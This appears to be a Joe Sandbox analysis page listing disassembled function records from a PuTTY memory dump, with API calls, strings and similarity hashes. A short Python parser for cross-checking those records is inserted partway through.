                      APIs
                      Strings
                      Similarity
                      • API ID: ChooseColor
                      • String ID: !c->data$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$All Files (*.*)
                      • API String ID: 2281747019-3574149933
                      • Opcode ID: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
                      • Instruction ID: 4cfd94384d8c5e998b06e55d20da88955dd475b5d8384ca11b09c287a925ec59
                      • Opcode Fuzzy Hash: 2f349e4b6fcea049a0fd930034c1fded1ce6c352395f760d69894cb39ab3f3ff
                      • Instruction Fuzzy Hash: F191B133918AC195FBA58B25E4443EA7BA4FF65754F200036CA8D83B94DF7DE881DB48
                      APIs
                        • Part of subcall function 00007FF678616460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF67861652D
                        • Part of subcall function 00007FF678616460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6786DEAB3,00000000), ref: 00007FF678616576
                        • Part of subcall function 00007FF678616890: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,?,?,00007FF67860DE03), ref: 00007FF6786168CB
                        • Part of subcall function 00007FF678616890: RegQueryValueExA.ADVAPI32 ref: 00007FF678616910
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860DEDE
                      • RegCloseKey.ADVAPI32 ref: 00007FF67860DFF0
                      Strings
                      Similarity
                      • API ID: Close$QueryValue$Create
                      • String ID: Default Settings$Recent sessions$Software\SimonTatham\PuTTY\Jumplist$Software\SimonTatham\PuTTY\Sessions
                      • API String ID: 1827015023-773100466
                      • Opcode ID: 85f5938d20b66986dfa13e30285e8505ad84e392d4b75f2aaa6e1492787ba138
                      • Instruction ID: ebeba768d52736cafb5853308a8c30c25c1ed880c927bd0a10b54e1c6e063df1
                      • Opcode Fuzzy Hash: 85f5938d20b66986dfa13e30285e8505ad84e392d4b75f2aaa6e1492787ba138
                      • Instruction Fuzzy Hash: 0F51D823E3965261EA50DB32A50577B6B91AF85BC4F744231EE4D87796DF3CEC00A348
                      APIs
                      Strings
                      Similarity
                      • API ID: DeleteMenu$Message
                      • String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
                      • API String ID: 1035315089-2786405544
                      • Opcode ID: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
                      • Instruction ID: b089c141516501d2553a9bdc9c82380d309935b9be90a2f795a2e16746153191
                      • Opcode Fuzzy Hash: b435416d0079812654ad5947054f8ee94bf0debb7ab9021b2e37498e67299442
                      • Instruction Fuzzy Hash: F0513D63A3C642A1FA40DB35E8512772F51AF98BD0F340432DD4DC7BA6DE2CE845AB48
                      APIs
                      • CreateFileA.KERNEL32 ref: 00007FF678604C10
                      • GetLastError.KERNEL32 ref: 00007FF678604C9A
                        • Part of subcall function 00007FF678604E40: GetCommState.KERNEL32 ref: 00007FF678604E69
                        • Part of subcall function 00007FF678649480: CreateEventA.KERNEL32 ref: 00007FF6786494D4
                        • Part of subcall function 00007FF678649480: InitializeCriticalSection.KERNEL32 ref: 00007FF678649534
                        • Part of subcall function 00007FF678649480: CreateEventA.KERNEL32 ref: 00007FF678649544
                        • Part of subcall function 00007FF678649480: CreateThread.KERNEL32 ref: 00007FF678649583
                        • Part of subcall function 00007FF678649480: CloseHandle.KERNEL32 ref: 00007FF678649591
                        • Part of subcall function 00007FF678649120: CreateEventA.KERNEL32 ref: 00007FF678649174
                        • Part of subcall function 00007FF678649120: InitializeCriticalSection.KERNEL32 ref: 00007FF6786491BD
                        • Part of subcall function 00007FF678649120: CreateEventA.KERNEL32 ref: 00007FF6786491CD
                        • Part of subcall function 00007FF678649120: CreateThread.KERNEL32 ref: 00007FF67864920C
                        • Part of subcall function 00007FF678649120: CloseHandle.KERNEL32 ref: 00007FF67864921A
                      Strings
                      Similarity
                      • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState
                      • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                      • API String ID: 2954106191-1737485005
                      • Opcode ID: 8462272af96375a9731e579ad06bba362a2b0478e26546baae626532e76adf5f
                      • Instruction ID: 2d07bb1dde6b478d3e64762d215ee6d7c118cee9678d8ef7215d3fbcbb67ca2f
                      • Opcode Fuzzy Hash: 8462272af96375a9731e579ad06bba362a2b0478e26546baae626532e76adf5f
                      • Instruction Fuzzy Hash: 1841E723E2474251EA109B32E8447AB3B51FB89BE4F604635DE5D87BD6EE3CE9419304
                      APIs
                      Strings
                      Similarity
                      • API ID: Window$CapturePlacement$BeepLongMessageRelease
                      • String ID: ,
                      • API String ID: 3018360031-3772416878
                      • Opcode ID: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
                      • Instruction ID: 62cd9395fdbfe61e33498d17fc5370738d62dbab895a7672c3612da20a8379d2
                      • Opcode Fuzzy Hash: 4c4ee8d28cffcb1e16955972c646d3b16fbee9cf70c6a5ceee3a983bde335b4f
                      • Instruction Fuzzy Hash: 8841F723E2C15256FBA49735A418B7A6EC1AFA1B80F344031DA4D836C6CF6CAD81DE09
                      APIs
                      Strings
                      Similarity
                      • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait
                      • String ID: CreateMutex("%s") failed: %s
                      • API String ID: 1132015839-2623464464
                      • Opcode ID: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
                      • Instruction ID: da91bc11f751f4d9cd0e72c1512122763d06d919622ca5318c0b340d25289399
                      • Opcode Fuzzy Hash: bbeb3b4ab6db268fd85c93e9a9ab5333092b447f88002d561e7431a4a6f20bc1
                      • Instruction Fuzzy Hash: B9212623A2D78191EA508B31A44437B6BA1EF95B90F340134EE8D83795DF3CDD459748
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                      • FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30DD
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A310A
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A311B
                      • FlsSetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A312C
                      • SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
                      • Instruction ID: 385fb80e3faac4e44c7f5af22014b456e20ef273b4864387345a08280815e53a
                      • Opcode Fuzzy Hash: be20319644ee280c18fa1c14b1b7ef3fa13c16217240b713059bc59993cee69d
                      • Instruction Fuzzy Hash: 9D21B022B2C22222F65463705B8207B6A828F447B0F300634D93ED7BC6EE2CEC01670A
                      APIs
                      Strings
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                      • String ID: CONOUT$
                      • API String ID: 3230265001-3130406586
                      • Opcode ID: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
                      • Instruction ID: 11d1d29fe767b8cd88b83b4904deede35d5c9e931e935ed0605351ddf9d10bed
                      • Opcode Fuzzy Hash: dbc9a16b5eeee48a6ee48bd4ee0368ae37068463da30654803f503f6f6d7a1e9
                      • Instruction Fuzzy Hash: E1119632728B4196E3508B26F8443267BA1FB58BE4F600234EA1DC7794CF7CDD148B48
                      APIs
                      Strings
                      Similarity
                      • API ID: ObjectPaletteReleaseSelectStock
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd$wintw_hdc
                      • API String ID: 3714893027-3486798234
                      • Opcode ID: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
                      • Instruction ID: 530b92f571565e0b904c23a367ad40317c7cc063663a617262d7f96f78ccf7c3
                      • Opcode Fuzzy Hash: 9bb73d81192733acc6fea9fdd995e3dbd9e5e04040e086bf5101fc3356dcf9c0
                      • Instruction Fuzzy Hash: 98015216E3C923A1FA509B76EC487722B51BF64B91F714035CC0DC66E49E2CED49EB08
                      APIs
                      Similarity
                      • API ID: _invalid_parameter_noinfo
                      • String ID:
                      • API String ID: 3215553584-0
                      • Opcode ID: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
                      • Instruction ID: b141a357b49fd60ec50b0428696d9505e373a09eadcf6062ee02449b3c00d361
                      • Opcode Fuzzy Hash: bd737a2eeb7fa6a4c21db5890d005f92dde7c3970c0139e1f6a19456b06c67e1
                      • Instruction Fuzzy Hash: 01F1E933A2D696A9F7518F35855027E3F95AB51BA0F649039C78CC73C1CE2CEC65AB08
                      APIs
                      Strings
                      Similarity
                      • API ID: BlinkCaretTime_set_error_mode
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/terminal/terminal.c$col >= 0 && col < line->cols$term->wrap$x > 0
                      • API String ID: 194089122-3097067695
                      • Opcode ID: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
                      • Instruction ID: a926659e17a1d7c3ed087b8896a477039f09b3d5f17fffc778affca813789be7
                      • Opcode Fuzzy Hash: 35dd72f10746de7798588f7908d4c8cb98d09942c4acdf97e757d8d036e6503f
                      • Instruction Fuzzy Hash: 40228F73A286868BFB688B35D844BAA7B60EB41744F144235CB5E87781DF3CF985C704
                      APIs
                      Similarity
                      • API ID: Char$ObjectSelectWidthWidth32
                      • String ID:
                      • API String ID: 4136774150-0
                      • Opcode ID: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
                      • Instruction ID: 786319740c3e46cc29332716b9fa51192e559025c3fb49c79cd826b8c12a1256
                      • Opcode Fuzzy Hash: c725a2898587075f43e1dc2d463796dcb35102116dd02835240eaa5493979230
                      • Instruction Fuzzy Hash: 17417327E3881691FA608B79E8C427A6B91BFA8755F740532DC0DC33A4DE2CED459B18
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A321F
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3255
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3282
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A3293
                      • FlsSetValue.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A32A4
                      • SetLastError.KERNEL32(?,?,?,00007FF67869A691,?,?,?,?,00007FF6786A6773,?,?,00000000,00007FF6786A332E,?,?,?), ref: 00007FF6786A32BF
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Value$ErrorLast
                      • String ID:
                      • API String ID: 2506987500-0
                      • Opcode ID: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
                      • Instruction ID: 03ddcd39222320b372589603face8c1cf1daa5df5e791802f205679f4271d615
                      • Opcode Fuzzy Hash: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
                      • Instruction Fuzzy Hash: 57118122E2C26262F954A7715B4707B5A429F457B0F300335D93ED6BC6DE2CEC01670A
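The records in this part of the report all have the same shape: an "APIs" list of call sites, a "Memory Dump Source" block naming the dump the function was lifted from, the IDA plugin snapshot name, and the "Similarity" hashes. When correlating them (for example to confirm that every call site really lies inside the putty module at 00007FF6785D0000, or that all dumps belong to the same process and analysis stage) it helps to parse them rather than eyeball them. The following Python is an added example, not Joe Sandbox code and not part of this report. Its reading of the dotted `.sdmp` name as `<process index>.<stage>.<dump id>.<page address>.<four id fields>` and of the snapshot name as `hcaresult_<process>_<stage>_<base>_<module>.jbxd` is an assumption inferred from the fact that `0000000C.00000002…00007FF6785D1000` (process 12, stage 2) sits beside `hcaresult_12_2_7ff6785d0000_putty.jbxd`; the 4 KiB page granularity and the expectation that "Opcode ID" equals "Opcode Fuzzy Hash" are likewise assumptions read off this page. The sample record is constructed from the FlsSetValue record above with its argument lists shortened.

```python
"""Parse one Joe Sandbox function record and cross-check its fields. Added
example, not Joe Sandbox code. Assumed, read off this report rather than
documented: .sdmp name = <process>.<stage>.<dump id>.<page addr>.<4 ids>,
snapshot = hcaresult_<process>_<stage>_<base>_<module>.jbxd, 4 KiB pages, and
"Opcode ID" always equals "Opcode Fuzzy Hash"."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

PAGE = 0x1000  # assumed page granularity of a dumped region
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
SOURCE_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(true|false)\s*$")
ASSOC_RE = re.compile(r"^•\s*Associated:\s*(\S+?\.sdmp)")  # ignores trailing link text
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)"
                     r"\.([0-9A-Fa-f]{16})(?:\.[0-9A-Fa-f]{8}){4}\.sdmp$")
SNAPNAME_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(\w+)\.jbxd$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
ApiCall = namedtuple("ApiCall", "name module args ref")  # ref = call-site address

# Constructed sample: the FlsSetValue record of this report with shortened argument lists.
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,?,00007FF67869A691), ref: 00007FF6786A321F
• FlsSetValue.KERNEL32(?,?,?,00007FF67869A691), ref: 00007FF6786A3255
• SetLastError.KERNEL32(?,?,?,00007FF67869A691), ref: 00007FF6786A32BF
Memory Dump Source
• Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
• Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• Opcode ID: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
• Opcode Fuzzy Hash: 1148fc4c0d35bbd3a571b67db096fae2734cc6304b1922bc55f22b24f00a6c59
"""

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    offset: int = 0  # module base ("Offset:")
    based_on_pe: bool = False
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "Snapshot File", "API ID", "Opcode ID", ...

def parse_record(text):
    """Walk the section headers and bullet lines of one record."""
    rec, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            rec.apis.append(ApiCall(m[1], m[2], m[3] or "", int(m[4], 16)))
        elif section == "Memory Dump Source" and (m := SOURCE_RE.match(line)):
            rec.source_file, rec.offset, rec.based_on_pe = m[1], int(m[2], 16), m[3] == "true"
        elif section == "Memory Dump Source" and (m := ASSOC_RE.match(line)):
            rec.associated.append(m[1])
        elif section in ("Joe Sandbox IDA Plugin", "Similarity") and (m := KV_RE.match(line)):
            rec.fields[m[1].strip()] = m[2].strip()
    return rec

def snapshot_module(rec):
    m = SNAPNAME_RE.match(rec.fields.get("Snapshot File", ""))
    return m[4] if m else ""

def check_record(rec):
    """Return the inconsistencies between a record's fields (empty list = consistent)."""
    snap = SNAPNAME_RE.match(rec.fields.get("Snapshot File", ""))
    if snap is None:
        return ["snapshot file name not understood"]
    proc, stage, base = int(snap[1]), int(snap[2]), int(snap[3], 16)
    problems = [] if base == rec.offset else [f"snapshot base {base:#x} != dump offset {rec.offset:#x}"]
    top = rec.offset + PAGE  # grows to a lower bound on the end of the dumped module
    for name in [rec.source_file, *rec.associated]:
        m = SDMP_RE.match(name)
        if m is None:
            problems.append(f"dump name not understood: {name!r}")
            continue
        dproc, dstage, page = int(m[1], 16), int(m[2], 16), int(m[4], 16)
        if (dproc, dstage) != (proc, stage):
            problems.append(f"{name}: process/stage {dproc}/{dstage} != snapshot {proc}/{stage}")
        if page < rec.offset:
            problems.append(f"{name}: page {page:#x} below module base {rec.offset:#x}")
        top = max(top, page + PAGE)
    for call in rec.apis:  # every call site must fall inside the dumped module
        if not rec.offset <= call.ref < top:
            problems.append(f"{call.name} call site {call.ref:#x} outside [{rec.offset:#x}, {top:#x})")
    if rec.fields.get("Opcode ID") != rec.fields.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID and Opcode Fuzzy Hash differ")
    return problems
```

`parse_record(SAMPLE)` yields three `ApiCall`s, the module base `0x7FF6785D0000` and `snapshot_module(...) == "putty"`; `check_record` returns an empty list for the record as it appears on the page, and a non-empty one if a dump name points at a different process or a call site falls outside the dumped module. The `top` bound is only a lower bound on the module's extent (the report lists pages, not region sizes), so a call site above it is a prompt to look, not proof of an error.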
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: FileWrite$ConsoleErrorLastOutput
                      • String ID: MZx
                      • API String ID: 2718003287-2575928145
                      • Opcode ID: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
                      • Instruction ID: 45b44c4d59df35fb1ea0f409c81112eedc422e232eff3dc845752b35306a1f24
                      • Opcode Fuzzy Hash: 84bb804351b2715cd8c68702ce643e48e67f41c0ca54e1dbf60fe47e9234377e
                      • Instruction Fuzzy Hash: C8D10233B28A9199E710CF79D4402AD3BB1FB45BA8B204236DE4DD7B99DE38D816D704
                      APIs
                      • GetCPInfo.KERNEL32(FFFFFFFE,00000000,0000022102FA6D50,?,00000000,00000000,00000000,?,00007FF678617CA2), ref: 00007FF6786192A5
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: UTF-8
                      • API String ID: 1807457897-243350608
                      • Opcode ID: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
                      • Instruction ID: ddf64852ec94488dc76df73def4be670e5928ee4ae37abd73fd1ba08aee267d9
                      • Opcode Fuzzy Hash: 31daed4d13549b50bec842ae628bc01fa7fd1093a734074d9845411709ca4802
                      • Instruction Fuzzy Hash: CE711223E2C19261FA645734549427F6EA26F41764FB80235DD9EC72E7EE2CEC42A208
                      APIs
                        • Part of subcall function 00007FF6786A3098: GetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30A7
                        • Part of subcall function 00007FF6786A3098: FlsGetValue.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A30BC
                        • Part of subcall function 00007FF6786A3098: SetLastError.KERNEL32(?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A3147
                      • TranslateName.LIBCMT ref: 00007FF6786A8D69
                      • TranslateName.LIBCMT ref: 00007FF6786A8DA4
                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF678698900), ref: 00007FF6786A8DE9
                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF678698900), ref: 00007FF6786A8E11
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorLastNameTranslate$CodePageValidValue
                      • String ID: utf8
                      • API String ID: 1791977518-905460609
                      • Opcode ID: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
                      • Instruction ID: 32827dae2ac7f0bcd3c2a467075b10913f3c8b73002fac55358bdd87323e16dd
                      • Opcode Fuzzy Hash: 147aec7f4f243be30fdf1adca31b102f843554426d767e7d2694068b4c2702b6
                      • Instruction Fuzzy Hash: 56518323A28763A1EB64AB3194005BB2BA5AF54F80F644131DE4C877C5EF7DED51E30A
                      APIs
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A2A
                        • Part of subcall function 00007FF6786B68B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B68C8
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A4C
                        • Part of subcall function 00007FF6786B6884: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B6898
                        • Part of subcall function 00007FF6786A44E4: HeapFree.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A44FA
                        • Part of subcall function 00007FF6786A44E4: GetLastError.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A4504
                      • GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF6786B6F58), ref: 00007FF6786B6A73
                      • _get_daylight.LIBCMT ref: 00007FF6786B6A3B
                        • Part of subcall function 00007FF6786B6854: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6786B6868
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                      • String ID: ?
                      • API String ID: 3458911817-1684325040
                      • Opcode ID: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
                      • Instruction ID: 85b948650445c3065e9d021df9df5a485ba06ae01d5336f0751fcce8f8bf9c80
                      • Opcode Fuzzy Hash: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
                      • Instruction Fuzzy Hash: BB416133A282029AE750DF35D8814BA7F61BF48798B645135FA4EC7696DF3DE8009708
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend$LocalTimewcsftime
                      • String ID: %Y-%m-%d %H:%M:%S
                      • API String ID: 2023452587-819171244
                      • Opcode ID: 1b2cfc4d059b90b867368085179728438f370badff4484846818805fcb837780
                      • Instruction ID: 99867507031804a1321c19ce81aa0fa4bf696f4e2d699b7b43b057f1869e4aaa
                      • Opcode Fuzzy Hash: 1b2cfc4d059b90b867368085179728438f370badff4484846818805fcb837780
                      • Instruction Fuzzy Hash: 2E41A033A38A02A6F7509B34E85577A2B51FFA5750F644132DA4DC7B94CF2CF902AB08
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
